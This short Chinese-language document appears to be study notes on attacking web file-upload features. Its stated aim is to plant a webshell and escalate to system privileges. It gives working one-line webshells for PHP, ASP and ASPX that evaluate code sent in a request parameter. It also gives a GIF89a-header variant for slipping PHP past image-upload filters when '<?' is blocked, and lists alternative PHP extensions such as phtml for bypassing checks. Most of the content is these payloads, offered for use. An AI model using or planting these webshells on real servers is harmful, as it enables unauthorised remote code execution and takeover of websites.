文件上传

一句话木马：上传一句话木马（简称Webshell）到目前web服务目录继而提权获取系统权限

php一句话木马：  <?php @eval($_POST[value]); ?>
asp一句话木马：  <%eval request ("value")%> 或  <% execute(request("value")) %>   
aspx一句话木马： <%@ Page Language="Jscript" %> <% eval(Request.Item["value"]) %>

index是普遍意义上的“首页”，也就是输入一个域名后会打开一个页面

基本上就是index.xxxx（基本上首页都不会把index.xxxx显示在url里，但也不绝对）

默认首页就是index.php  不知道干啥的时候可以试试

图片文件上传

GIF文件头：GIF89a? <script language=”php”>eval($_REQUEST[value])</script>      <<=当”<?”被过滤时，无法使用php一句话木马，可以用此语句来绕过过滤

phtml ：php网页的后缀名，常见的还有php、php3